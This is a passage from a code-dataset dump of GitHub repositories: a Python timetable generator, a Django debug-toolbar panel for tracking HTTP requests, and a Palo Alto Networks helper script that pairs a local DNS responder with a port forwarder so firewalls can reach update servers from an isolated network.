otherTime):\r\n return not(self.isLater(otherTime)) and not(self.isEqual(otherTime))\r\n\r\n def __le__(self, otherTime):\r\n return not(self.isLater(otherTime))\r\n\r\n def __eq__(self, otherTime):\r\n return self.isEqual(otherTime)\r\n\r\n def __ge__(self, otherTime):\r\n return self.isLater(otherTime) or self.isEqual(otherTime)\r\n\r\n def __gt__(self, otherTime):\r\n return self.isLater(otherTime)\r\n\r\nclass TimeRange:\r\n def __init__(self, initial, final):\r\n self.initial = initial\r\n self.final = final\r\n\r\n def __str__(self):\r\n return \"{} - {}\".format(str(self.initial), str(self.final))\r\n\r\n def __len__(self):\r\n return Time.distance(self.initial, self.final)\r\n\r\n def timeRangeArray(timeRange, step=30):\r\n timeList = []\r\n current = copy.deepcopy(timeRange.initial)\r\n while(current <= timeRange.final):\r\n timeList.append(copy.deepcopy(current))\r\n current.add(step)\r\n return timeList\r\n\r\n def rangesOverlap(firstRange, secondRange):\r\n return ((firstRange.initial >= secondRange.initial) and (firstRange.initial < secondRange.final)\r\n or (firstRange.final>secondRange.initial) and (firstRange.final <= secondRange.final)\r\n or (secondRange.initial >= firstRange.initial) and (secondRange.initial < firstRange.final)\r\n or (secondRange.final > firstRange.initial) and (secondRange.final <= firstRange.final))\r\n\r\n def findTimeRange(subjectList):\r\n lowestTime = subjectList[0].timeRange.initial\r\n highestTime = subjectList[0].timeRange.final\r\n for subject in subjectList:\r\n if(subject.timeRange.initial < lowestTime): lowestTime = subject.timeRange.initial\r\n if(subject.timeRange.final > highestTime): highestTime = subject.timeRange.final\r\n return TimeRange(lowestTime, highestTime)\r\n\r\n #True if second range contains first\r\n def timeRangesInside(first, second):\r\n return (first.initial >= second.initial) and (first.final <= second.final)\r\n" }, { "alpha_fraction": 0.5727163553237915, "alphanum_fraction": 0.5763221383094788, "avg_line_length": 42.37333297729492, "blob_id": "34913d9077ebaf61ba192d93d7ea79347f28b802", "content_id": "569cd97b0cc49eb7fb3103557983772a8e17d2dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3334, "license_type": "no_license", "max_line_length": 173, "num_lines": 75, "path": "/SubjectEntryModule.py", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "from TimeModule import *\r\nimport json\r\nimport io\r\n\r\nclass SubjectModule(IntEnum):\r\n TEORICO = 0\r\n PRACTICO = 1\r\n TEOPRA = 2\r\n CONSULTA = 3\r\n\r\n def __str__(self):\r\n if(self.value == 0): return \"Teórico\"\r\n elif(self.value == 1): return \"Práctico\"\r\n elif(self.value == 2): return \"Teórico/Práctico\"\r\n elif(self.value == 3): return \"Consulta\"\r\n\r\n def fromString(moduleName):\r\n if(moduleName == \"Teórico\"): return SubjectModule.TEORICO\r\n elif(moduleName == \"Práctico\"): return SubjectModule.PRACTICO\r\n elif(moduleName == \"Teo-Pra\"): return SubjectModule.TEOPRA\r\n elif(moduleName == \"Consulta\"): return SubjectModule.CONSULTA\r\n\r\nclass SubjectEntry:\r\n def __init__(self, name, module, timeRange, days):\r\n self.name = name\r\n self.module = module\r\n self.timeRange = timeRange\r\n self.days = days\r\n\r\n def printEntry(self):\r\n print(\"-------------------------\")\r\n print(\"Subject : {}\\nInitial Time : {}\\nFinal Time : {}\\nDays : {}\".format(self.name, self.timeRange.initial, self.timeRange.final, [str(day) for day in self.days]))\r\n print(\"-------------------------\")\r\n\r\n def parseJSON(filepath):\r\n allSubjects = []\r\n myfile = open(filepath, encoding=\"utf-8-sig\")\r\n myJSON = json.load(myfile)\r\n for subject in myJSON:\r\n subJSON = myJSON[subject]\r\n newSubjectEntry = SubjectEntry(subJSON[\"name\"],\r\n SubjectModule.fromString(subJSON[\"module\"]),\r\n TimeRange(Time.fromString(subJSON[\"initialTime\"]),\r\n Time.fromString(subJSON[\"finalTime\"])),\r\n Days.fromStringArray(subJSON[\"days\"]))\r\n allSubjects.append(newSubjectEntry)\r\n return allSubjects\r\n\r\n def parseJSONWithChoices(filepath, choices):\r\n allSubjects = []\r\n myfile = open(filepath, encoding=\"utf-8-sig\")\r\n myJSON = json.load(myfile)\r\n for subject in myJSON:\r\n subJSON = myJSON[subject]\r\n newSubjectEntry = SubjectEntry(subJSON[\"name\"],\r\n SubjectModule.fromString(subJSON[\"module\"]),\r\n TimeRange(Time.fromString(subJSON[choices[subject]][\"initialTime\"]),\r\n Time.fromString(subJSON[choices[subject]][\"finalTime\"])),\r\n Days.fromStringArray(subJSON[choices[subject]][\"days\"]))\r\n allSubjects.append(newSubjectEntry)\r\n return allSubjects\r\n\r\n def daysInCommon(firstSubject, secondSubject):\r\n return list(set(firstSubject.days).intersection(secondSubject.days))\r\n\r\n def subjectsOverlap(firstSubject, secondSubject):\r\n return (SubjectEntry.daysInCommon(firstSubject, secondSubject) != []) and TimeRange.rangesOverlap(firstSubject.timeRange, secondSubject.timeRange)\r\n\r\n def subjectListOverlap(subjectList):\r\n overlapingList = []\r\n for i in range(len(subjectList) - 1):\r\n for j in range(i+1, len(subjectList)):\r\n if(SubjectEntry.subjectsOverlap(subjectList[i], subjectList[j])):\r\n overlapingList.append([subjectList[i], subjectList[j]])\r\n return overlapingList\r\n" } ]
6
enginoid/django-debug-toolbar-requests
https://github.com/enginoid/django-debug-toolbar-requests
b6e217505f17d66c71264a0c637a8240f8ef61fe
58a75bf7f17d2670d44d0d54deeb1e6839728a8c
92adf85232b757afc1cb26770ddfac51b1b2cc8a
refs/heads/master
2021-01-01T19:11:05.810259
2012-07-21T14:05:47
2012-07-21T14:05:47
5,115,840
5
0
null
null
null
null
null
[ { "alpha_fraction": 0.6780683994293213, "alphanum_fraction": 0.6780683994293213, "avg_line_length": 28.294116973876953, "blob_id": "92dcbc83554420d8b540621f522c4958c2d0c6f9", "content_id": "599f40ab7b7932c3e59af550a87120cab2bb5d64", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "permissive", "max_line_length": 70, "num_lines": 17, "path": "/debug_toolbar_requests/models.py", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "from debug_toolbar_requests.utils import timedelta_with_milliseconds\n\n\nclass ResponseTimer(object):\n def __init__(self, start_time=None, end_time=None, response=None):\n self.start_time = start_time\n self.end_time = end_time\n self.response = response\n\n @property\n def duration(self):\n seconds = self.end_time - self.start_time\n return timedelta_with_milliseconds(seconds=seconds)\n\n @property\n def request(self):\n return self.response.request" }, { "alpha_fraction": 0.7232704162597656, "alphanum_fraction": 0.7547169923782349, "avg_line_length": 31, "blob_id": "aba2c9219dfbcb13cbe1ea5e687199a7ce9fc908", "content_id": "d9c553a4a7bf17df94c221c87d99486f099951b8", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 159, "license_type": "permissive", "max_line_length": 53, "num_lines": 5, "path": "/debug_toolbar_requests/utils.py", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "from datetime import timedelta\n\nclass timedelta_with_milliseconds(timedelta):\n def milliseconds(self):\n return int(round(self.microseconds / 1000.0))" }, { "alpha_fraction": 0.517241358757019, "alphanum_fraction": 0.5219650268554688, "avg_line_length": 36.157894134521484, "blob_id": "4957db8bd955d92118568993f5f71143f594e991", "content_id": "ca4b07aa2e9aa3406c501ebd1a5da526899d71f3", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 2117, "license_type": "permissive", "max_line_length": 104, "num_lines": 57, "path": "/debug_toolbar_requests/templates/debug_toolbar/panels/requests.html", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "{% load i18n %}\n\n{% for response_timer in response_timers %}\n{% with response_timer.request as request %}\n{% with response_timer.response as response %}\n\n <h4>{{ request.url }}\n ({{ response_timer.duration.milliseconds }} {% trans 'ms' %})</h4>\n\n {% with 'debug_toolbar/panels/snippets/key_value_table.html' as key_value_template %}\n <h5>{% trans \"Response\" %}</h5>\n {% include key_value_template with items=response.template_items %}\n\n <h5>{% trans \"Request\" %}</h5>\n {% include key_value_template with items=request.template_items %}\n\n <h5>{% trans \"Actions\" %}</h5>\n {% if request.is_browser_repeatable %}\n <p>\n {% blocktrans %}\n This functionality is heavily under-tested. Please be very\n suspect of this code not accurately replaying requests, but\n please do file a bug if that happens.\n {% endblocktrans %}\n </p>\n <form action=\"{{ request.full_url }}\" method=\"{{ request.method }}\"\n {% if request.files %}enctype=\"multipart/form-data\"{% endif %}>\n\n {% for name, value in request.data.items %}\n <input type=\"hidden\" name=\"{{ name }}\" value=\"{{ value }}\" />\n {% endfor %}\n\n {% for name, value in request.files.items %}\n <input type=\"hidden\" name=\"{{ name }}\" value=\"{{ value }}\" />\n {% endfor %}\n\n <button type=\"submit\">{% trans \"Replay request (in browser)\" %}</button>\n </form>\n {% else %}\n {# TODO: perhaps only display this if toolbar debug is on #}\n <div>\n <p>{% trans \"Can't repeat request in browser.\" %}\n {% trans \"Conditions not satisifed:\" %}</p>\n <ul>\n {% for condition_name, is_satisfied in request.browser_repeatability_conditions.items %}\n {% if not is_satisfied %}\n <li>{{ condition_name }}</li>\n {% endif %}\n {% endfor %}\n </ul>\n </div>\n {% endif %}\n {% endwith %}\n\n{% endwith %}\n{% endwith %}\n{% endfor %}" }, { "alpha_fraction": 0.6251308917999268, "alphanum_fraction": 0.6293193697929382, "avg_line_length": 34.407405853271484, "blob_id": "a1c73c62edb751dabd102d178b8dc4ad67d1373b", "content_id": "bc9637d0f4b4f3dc3e3b187b73c6c8fb3d5ca673", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 955, "license_type": "permissive", "max_line_length": 76, "num_lines": 27, "path": "/setup.py", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(\n name='django-debug-toolbar-requests',\n version='0.0.3',\n description=('A django-debug-toolbar panel for HTTP requests made with '\n 'the `requests` library.'),\n long_description=open('README.rst').read(),\n author='Fred Jonsson',\n author_email='[email protected]',\n url='https://github.com/enginous/django-debug-toolbar-requests',\n license='BSD',\n packages=['debug_toolbar_requests'],\n package_data={'debug_toolbar_requests': ['templates/*.html']},\n zip_safe=False,\n include_package_data=True,\n classifiers=[\n 'Development Status :: 1 - Planning',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n)" }, { "alpha_fraction": 0.5923614501953125, "alphanum_fraction": 0.5929855108261108, "avg_line_length": 43.754188537597656, "blob_id": "5648a30348a4ff187ab67fed2a84a39502a2d35b", "content_id": "c1b4ab8cf9719a2ec8ccbdc402a0064e85534deb", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8012, "license_type": "permissive", "max_line_length": 91, "num_lines": 179, "path": "/debug_toolbar_requests/panel.py", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "from functools import partial\nfrom pprint import pformat\nfrom threading import local\nimport time\n\nimport requests\nimport requests.defaults\n\nfrom django.utils.translation import ugettext_lazy as _, ngettext\nfrom django.template.defaultfilters import truncatechars\n\nfrom debug_toolbar.panels import DebugPanel\n\n# Retain, because it won't be retrievable after monkey-patching.\nfrom debug_toolbar_requests.models import ResponseTimer\n\noriginal_thread_class = requests.models.Request\n\nclass RequestsDebugPanel(DebugPanel):\n \"\"\"\n A panel to display HTTP requests made by the `requests` library.\n \"\"\"\n\n name = 'Requests'\n template = 'debug_toolbar/panels/requests.html'\n has_content = True\n\n def receive_response(self, index, response):\n self.thread_locals.response_timers[index].end_time = time.time()\n self.thread_locals.response_timers[index].response = response\n\n def receive_request(self, index, request):\n self.thread_locals.response_timers[index].start_time = time.time()\n\n def __init__(self, *args, **kwargs):\n super(RequestsDebugPanel, self).__init__(*args, **kwargs)\n\n self.thread_locals = local()\n self.thread_locals.response_timers = []\n debug_panel = self\n\n class TrackedRequest(original_thread_class):\n def __init__(self, *args, **kwargs):\n super(TrackedRequest, self).__init__(*args, **kwargs)\n\n response_timer = ResponseTimer()\n next_index = len(debug_panel.thread_locals.response_timers)\n debug_panel.thread_locals.response_timers.append(response_timer)\n\n self.register_hook('pre_request',\n hook=partial(debug_panel.receive_request, next_index))\n self.register_hook('response',\n hook=partial(debug_panel.receive_response, next_index))\n\n # TODO: in the interest of forward-compatibility, can this be done\n # more safely dynamically; e.g. by looking for use of the `Request`\n # object in all package modules?\n requests.models.Request = TrackedRequest\n requests.Request = TrackedRequest\n requests.sessions.Request = TrackedRequest\n\n def nav_title(self):\n return _('HTTP Requests')\n\n def title(self):\n return _('HTTP Requests')\n\n def nav_subtitle(self):\n request_count = len(self.thread_locals.response_timers)\n return ngettext(\"%d request\", \"%d requests\", request_count) % request_count\n\n def url(self):\n return ''\n\n def process_response(self, _request, _response): # unused params\n response_timers = self.thread_locals.response_timers\n for response_timer in response_timers:\n # Tack template-specific information on to the response timer\n # objects to save some boilerplate in the template.\n response = response_timer.response\n response_timer.response.template_items = (\n (_(\"URL\"), response.url),\n (_(\"Status\"), u\"{code} {reason}\".format(\n code=response.status_code, reason=response.reason)),\n (_(\"Headers\"), pformat(response.headers)),\n (_(\"Body\"), truncatechars(response.text, 1024)),\n )\n\n request = response_timer.request\n response_timer.request.template_items = (\n (_(\"URL\"), request.url),\n (_(\"Method\"), request.method),\n (_(\"Headers\"), pformat(request.headers)),\n (_(\"Parameters\"), request.params),\n\n # TODO: it would be nice to get the actual raw body\n (_(\"Data\"), request.data),\n (_(\"Files\"), request.files),\n )\n\n # TODO: this desperately needs tests\n # TODO: the browser replay functionality calls for extraction\n # into its own module.\n def check_browser_compatible_headers(request):\n # We only have access to the resulting headers. To verify\n # that the standard `requests` headers are being sent (which\n # themselves are browser-compatible), we check that the\n # headers sent are exactly equivalent to the default headers\n # sent by `requests`.\n\n # As an exception, we can also support a request if it only\n # adds a `Content-Type` header to the defaults sent by\n # `requests`. However, we only support that header if it\n # contains one of the two encodings supported by HTML4.\n browser_supported_enctypes = (\n # automatically sent by browser for every POST form\n 'application/x-www-form-urlencoded',\n\n # sent by POST forms with `enctype` set to this\n 'multipart/form-data'\n )\n\n headers = request.headers.copy() # don't corrupt the original\n header_name = 'Content-Type'\n content_type_header = headers.get(header_name, '')\n for enctype in browser_supported_enctypes:\n # `startswith` is used because we might have a trailing\n # semicolon: multipart/form-data; boundary=foobar\n if content_type_header.startswith(enctype):\n # TODO: need much safer parsing for this, find header lib\n # TODO: also matches 'multipart/form-data-foo`\n # TODO: messy\n del headers[header_name]\n\n return headers == requests.defaults.defaults['base_headers']\n\n # The template displays a button in-browser allowing the user to\n # repeat the call. Because this is done through a form, we cannot\n # allow this for some more complex requests. Multiple conditions\n # are required to determine this, and they are kept in a dict\n # instead of a serial condition for traceability (for debugging,\n # or to show why request can't be displayed in the template).\n response_timer.request.browser_repeatability_conditions = dict(\n is_get_or_post = request.method in ('GET', 'POST'),\n\n # The browser can't send its own headers. We must ensure\n # that the headers sent only use headers that won't make\n # the meaning of the request semantically different, or\n # headers that we can support using forms (e.g. 'enctype'\n # can emulate some values of the'Content-Type' header.)\n has_browser_compatible_headers = check_browser_compatible_headers(request),\n\n # Can't repeat GET requests with anything in the body. The\n # browser will just tack it on to the URL instead of using\n # a GET body. (Not that GET bodies have semantic meaning in\n # HTTP, but people still do strange things.)\n is_not_get_with_body = any((\n (request.method == 'POST'),\n ((not request.data) and (not request.files)),\n )),\n\n # In POST requests, you can send multipart and non-multipart\n # data separately. Once browser forms have an encoding of\n # `multipart/form-data`, however, every parameter will be\n # sent as multipart data.\n is_not_data_and_files = not (request.data and request.files),\n\n # For POST bodies, the browser only do key-value bodies and\n # not other payloads, such as strings.\n is_key_value_body = isinstance(request.data, dict),\n )\n\n response_timer.request.is_browser_repeatable = all(\n response_timer.request.browser_repeatability_conditions.values()\n )\n\n self.record_stats({\n 'response_timers': response_timers,\n })\n\n" }, { "alpha_fraction": 0.6115485429763794, "alphanum_fraction": 0.6115485429763794, "avg_line_length": 23.580644607543945, "blob_id": "6a7cfb668f908c96c9451e2b9eb6a25d7555458c", "content_id": "baf4d52396f4afaab803c490ccb6db0ba30ad2e7", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 762, "license_type": "permissive", "max_line_length": 112, "num_lines": 31, "path": "/README.rst", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "===================================\nDjango Debug Toolbar Requests Panel\n===================================\n\nThe Django Debug Toolbar Requests Panel (no less) is a plugin that provides\ndebug information about HTTP requests done with Kenneth Reitz' HTTP library,\n`requests`.\n\nInstallation\n============\n\nAdd the following lines to your ``settings.py``::\n\n INSTALLED_APPS = (\n ...\n 'debug_toolbar_requests',\n ...\n )\n\n DEBUG_TOOLBAR_PANELS = (\n ...\n 'debug_toolbar_requests.panel.RequestsDebugPanel',\n ...\n )\n\nAn extra panel titled \"HTTP Requests\" should appear in your debug toolbar.\n\nScreenshot\n==========\n\n.. image:: https://raw.github.com/enginous/django-debug-toolbar-requests/master/docs/images/screenshots/main.png\n" } ]
6
tdmakepeace/PaloSocketProxyandDNS
https://github.com/tdmakepeace/PaloSocketProxyandDNS
81464150cc1ca1fd8825b4f36028f3298b4fde2f
a8441432a1b40b4e16b256e49c91d3d09393c557
a272e25c5024a23297f63aa2f5a362636cb94421
refs/heads/master
2020-06-20T03:20:40.712417
2019-07-15T10:01:09
2019-07-15T10:01:09
196,973,236
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7914055585861206, "alphanum_fraction": 0.7914055585861206, "avg_line_length": 54.849998474121094, "blob_id": "cbf3102e86c08c319fba9370cf72165726c05d54", "content_id": "e0833ec8a99a8c89e3e66c0090154a49930ece99", "detected_licenses": [ "MIT", "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1117, "license_type": "permissive", "max_line_length": 176, "num_lines": 20, "path": "/README.md", "repo_name": "tdmakepeace/PaloSocketProxyandDNS", "src_encoding": "UTF-8", "text": "# PaloSocketProxyandDNS\nPalo Alto Networks - Tool for helping to support the bootstrap process of a VM-Series without direct internet access from the \nmanagement interface.\n<br><br>\nThe tool acts as a DNS server on the management networks, and returns the addresses configured for the main sites the Palo Alto Networks \nNGFW needs during the bootstrapping process.<br>\nThe tool also creates socket proxies on those addresses through to the real desitinations.<br>\nThe idea behind it, is to act as a proxy server to give the NGFW access to the Palo Alto Networks sites over the internet from a walled-garden networks.\n<br>\n\t\n\n# To setup\nOn a host configure secondary IP-addresses on the interface to be used as the socket-proxy. <br> <br>\nConfigure the NGFW to use the default address as the default-gateway and the DNS server.<br>\n\n<br>\nAs long as the host running the script has access to the internet via a true proxy or secondary interface the only sites the NGFW will have access to are defined in the script.\n\n# Disclaimer\nThis software is provided without support, warranty, or guarantee. Use at your own risk.\n" }, { "alpha_fraction": 0.5528854727745056, "alphanum_fraction": 0.5779500603675842, "avg_line_length": 36.576053619384766, "blob_id": "65cebb879a5073266f381c934e486ac76e2f9b43", "content_id": "1b7c9b2690c03b01fcb47f5f92c8f9e98ef036ac", "detected_licenses": [ "MIT", "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11610, "license_type": "permissive", "max_line_length": 127, "num_lines": 309, "path": "/bootstrapforward.py", "repo_name": "tdmakepeace/PaloSocketProxyandDNS", "src_encoding": "UTF-8", "text": "###############################\n# The code is not pretty, and is stolen from a number of other sources and modified. \n# relys on the machine running the code have multiple IP addresses to run the port forward on 443.\n# the server runs as a DNS server for the main URL's needed to do bootstrapping.\n# any other dns resolves to the host default IP address, you can redirect this to anywhere as required.\n###############################\n\nimport socket\nimport threading\nimport sys\nimport time\nimport socketserver\n\n\n\nDNS_HEADER_LENGTH = 12\n# TODO make some DNS database with IPs connected to regexs\n\nDNShost = '192.168.1.209'\nDNSport = 53\n \ndefault = '192.168.1.209'\nupdates = '192.168.1.210'\ndownloads ='192.168.1.211'\nurlcloud = '192.168.1.212'\ndnsservice = '192.168.1.213'\n\n###### other entries you might need if you want to run everything via the socket proxy.\n# serverlist.urlcloud.paloaltonetworks.com\n# pandb2dc10prod.urlcloud.paloaltonetworks.com\n# pandb2dlprod.urlcloud.paloaltonetworks.com\n#\n# assume you can add more by adding more IP addresses to the host. see the \n######\n\n################DNS part##############\n\nclass DNSHandler(socketserver.BaseRequestHandler):\n def handle(self):\n socket = self.request[1]\n data = self.request[0].strip()\n\n # If request doesn't even contain full header, don't respond.\n if len(data) < DNS_HEADER_LENGTH:\n return\n\n # Try to read questions - if they're invalid, don't respond.\n try:\n all_questions = self.dns_extract_questions(data)\n except IndexError:\n return\n\n # Filter only those questions, which have QTYPE=A and QCLASS=IN\n # TODO this is very limiting, remove QTYPE filter in future, handle different QTYPEs\n accepted_questions = []\n for question in all_questions:\n name = str(b'.'.join(question['name']), encoding='UTF-8')\n# print(name)\n if question['qtype'] == b'\\x00\\x01' and question['qclass'] == b'\\x00\\x01':\n accepted_questions.append(question)\n print('\\033[32m{}\\033[39m'.format(name))\n else:\n print('\\033[31m{}\\033[39m'.format(name))\n\n\n response = (\n self.dns_response_header(data) +\n self.dns_response_questions(accepted_questions) +\n self.dns_response_answers(accepted_questions)\n )\n socket.sendto(response, self.client_address)\n\n def dns_extract_questions(self, data):\n \"\"\"\n Extracts question section from DNS request data.\n See http://tools.ietf.org/html/rfc1035 4.1.2. Question section format.\n \"\"\"\n questions = []\n # Get number of questions from header's QDCOUNT\n n = (data[4] << 8) + data[5]\n # Where we actually read in data? Start at beginning of question sections.\n pointer = DNS_HEADER_LENGTH\n # Read each question section\n for i in range(n):\n question = {\n 'name': [],\n 'qtype': '',\n 'qclass': '',\n }\n length = data[pointer]\n # Read each label from QNAME part\n while length != 0:\n start = pointer + 1\n end = pointer + length + 1\n question['name'].append(data[start:end])\n pointer += length + 1\n length = data[pointer]\n # Read QTYPE\n question['qtype'] = data[pointer+1:pointer+3]\n # Read QCLASS\n question['qclass'] = data[pointer+3:pointer+5]\n # Move pointer 5 octets further (zero length octet, QTYPE, QNAME)\n pointer += 5\n questions.append(question)\n return questions\n\n def dns_response_header(self, data):\n \"\"\"\n Generates DNS response header.\n See http://tools.ietf.org/html/rfc1035 4.1.1. Header section format.\n \"\"\"\n header = b''\n # ID - copy it from request\n header += data[:2]\n # QR 1 response\n # OPCODE 0000 standard query\n # AA 0 not authoritative\n # TC 0 not truncated\n # RD 0 recursion not desired\n # RA 0 recursion not available\n # Z 000 unused\n # RCODE 0000 no error condition\n header += b'\\x80\\x00'\n # QDCOUNT - question entries count, set to QDCOUNT from request\n header += data[4:6]\n # ANCOUNT - answer records count, set to QDCOUNT from request\n header += data[4:6]\n # NSCOUNT - authority records count, set to 0\n header += b'\\x00\\x00'\n # ARCOUNT - additional records count, set to 0\n header += b'\\x00\\x00'\n return header\n\n def dns_response_questions(self, questions):\n \"\"\"\n Generates DNS response questions.\n See http://tools.ietf.org/html/rfc1035 4.1.2. Question section format.\n \"\"\"\n sections = b''\n for question in questions:\n section = b''\n for label in question['name']:\n # Length octet\n section += bytes([len(label)])\n section += label\n # Zero length octet\n section += b'\\x00'\n section += question['qtype']\n section += question['qclass']\n sections += section\n return sections\n\n def dns_response_answers(self, questions):\n \"\"\"\n Generates DNS response answers.\n See http://tools.ietf.org/html/rfc1035 4.1.3. Resource record format.\n \"\"\"\n records = b''\n for question in questions:\n name = str(b'.'.join(question['name']), encoding='UTF-8')\n# print(name)\n if name == \"updates.paloaltonetworks.com\":\n IP = updates\n elif name == \"downloads.paloaltonetworks.com\":\n IP = downloads\n elif name == \"s0000.urlcloud.paloaltonetworks.com\":\n IP = urlcloud\n elif name == \"dns.service.paloaltonetworks.com\":\n IP = dnsservice\n else:\n IP = default\n# print (IP)\n \n record = b''\n for label in question['name']:\n # Length octet\n record += bytes([len(label)])\n record += label\n # Zero length octet\n record += b'\\x00'\n # TYPE - just copy QTYPE\n # TODO QTYPE values set is superset of TYPE values set, handle different QTYPEs, see RFC 1035 3.2.3.\n record += question['qtype']\n # CLASS - just copy QCLASS\n # TODO QCLASS values set is superset of CLASS values set, handle at least * QCLASS, see RFC 1035 3.2.5.\n record += question['qclass']\n # TTL - 32 bit unsigned integer. Set to 0 to inform, that response\n # should not be cached.\n record += b'\\x00\\x00\\x00\\x00'\n # RDLENGTH - 16 bit unsigned integer, length of RDATA field.\n # In case of QTYPE=A and QCLASS=IN, RDLENGTH=4.\n record += b'\\x00\\x04'\n # RDATA - in case of QTYPE=A and QCLASS=IN, it's IPv4 address.\n record += b''.join(map(\n lambda x: bytes([int(x)]),\n IP.split('.')\n ))\n records += record\n return records\n\n################ DNS Part END ##############\n\n################ Socket forwarder ##############\n\n\ndef handledns(buffer):\n return buffer\n \n\ndef transfer(src, dst, direction):\n src_name = src.getsockname()\n src_address = src_name[0]\n src_port = src_name[1]\n dst_name = dst.getsockname()\n dst_address = dst_name[0]\n dst_port = dst_name[1]\n while True:\n buffer = src.recv(0x400)\n if len(buffer) == 0:\n print (\"[-] No data received! Breaking...\")\n break\n # print \"[+] %s:%d => %s:%d [%s]\" % (src_address, src_port, dst_address, dst_port, repr(buffer))\n if direction:\n print (\"[+] %s:%d >>> %s:%d [%d]\" % (src_address, src_port, dst_address, dst_port, len(buffer)))\n else:\n print (\"[+] %s:%d <<< %s:%d [%d]\" % (dst_address, dst_port, src_address, src_port, len(buffer)))\n dst.send(handledns(buffer))\n print (\"[+] Closing connecions! [%s:%d]\" % (src_address, src_port))\n src.shutdown(socket.SHUT_RDWR)\n src.close()\n print (\"[+] Closing connecions! [%s:%d]\" % (dst_address, dst_port))\n dst.shutdown(socket.SHUT_RDWR)\n dst.close()\n\n\ndef server(local_host, local_port, remote_host, remote_port, max_connection,host):\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server_socket.bind((local_host, local_port))\n server_socket.listen(max_connection)\n print (\"[+] Server started [%s:%d] for [%s]\" % (local_host, local_port, host))\n print (\"[+] Connect to [%s:%d] to get the content of [%s:%d]\" % (local_host, local_port, remote_host, remote_port))\n while True:\n local_socket, local_address = server_socket.accept()\n print (\"[+] Detect connection from [%s:%s]\" % (local_address[0], local_address[1]))\n print (\"[+] Trying to connect the REMOTE server [%s:%d]\" % (remote_host, remote_port))\n remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n remote_socket.connect((remote_host, remote_port))\n print (\"[+] Tunnel connected! Tranfering data...\")\n # threads = []\n s = threading.Thread(target=transfer, args=(\n remote_socket, local_socket, False))\n r = threading.Thread(target=transfer, args=(\n local_socket, remote_socket, True))\n # threads.append(s)\n # threads.append(r)\n s.start()\n r.start()\n print (\"[+] Releasing resources...\")\n remote_socket.shutdown(socket.SHUT_RDWR)\n remote_socket.close()\n local_socket.shutdown(socket.SHUT_RDWR)\n local_socket.close()\n print (\"[+] Closing server...\")\n server_socket.shutdown(socket.SHUT_RDWR)\n server_socket.close()\n print (\"[+] Server shuted down!\")\n \n \n \n################ Socket forwarder END ##############\n \ndef main():\n MAX_CONNECTION = 0x10\n LOCAL_HOST1 = updates\n LOCAL_HOST2 = downloads\n LOCAL_HOST3 = urlcloud\n LOCAL_HOST4 = dnsservice\n\n HOST1 = 'updates.paloaltonetworks.com'\n HOST2 = 'downloads.paloaltonetworks.com'\n HOST3 = 's0000.urlcloud.paloaltonetworks.com'\n HOST4 = 'dns.service.paloaltonetworks.com'\n\n REMOTE_HOST1 = socket.gethostbyname(HOST1)\n REMOTE_HOST2 = socket.gethostbyname(HOST2)\n REMOTE_HOST3 = socket.gethostbyname(HOST3)\n REMOTE_HOST4 = socket.gethostbyname(HOST4)\n LOCAL_PORT = 443\n REMOTE_PORT = 443\n\n thread1 = threading.Thread(target=server, args=(LOCAL_HOST1, LOCAL_PORT, REMOTE_HOST1, REMOTE_PORT, MAX_CONNECTION, HOST1))\n thread2 = threading.Thread(target=server, args=(LOCAL_HOST2, LOCAL_PORT, REMOTE_HOST2, REMOTE_PORT, MAX_CONNECTION, HOST2))\n thread3 = threading.Thread(target=server, args=(LOCAL_HOST3, LOCAL_PORT, REMOTE_HOST3, REMOTE_PORT, MAX_CONNECTION, HOST3))\n thread4 = threading.Thread(target=server, args=(LOCAL_HOST4, LOCAL_PORT, REMOTE_HOST4, REMOTE_PORT, MAX_CONNECTION, HOST4))\n \n thread1.start()\n thread2.start()\n thread3.start()\n thread4.start()\n \n dnsserver = socketserver.ThreadingUDPServer((DNShost, DNSport), DNSHandler)\n print('\\033[36mStarted DNS server.\\033[39m')\n threadx = threading.Thread(target=dnsserver.serve_forever, args=())\n threadx.start() \n\n\nif __name__ == \"__main__\":\n main()" } ]
2
LeonB/gstreamerfs
https://github.com/LeonB/gstreamerfs
687f3378f6146fc330cbbdf6ee076548470dcad6
2310ea31f57d10730f76ba4b5ffa6d5d45d5b12f
5935eb866fce5a390fe6ce3861e4918264688ce0
refs/heads/master
2016-09-10T18:35:24.983772
2010-08-03T08:54:31
2010-08-03T08:54:31
null
0
0
null
null
null
null
null
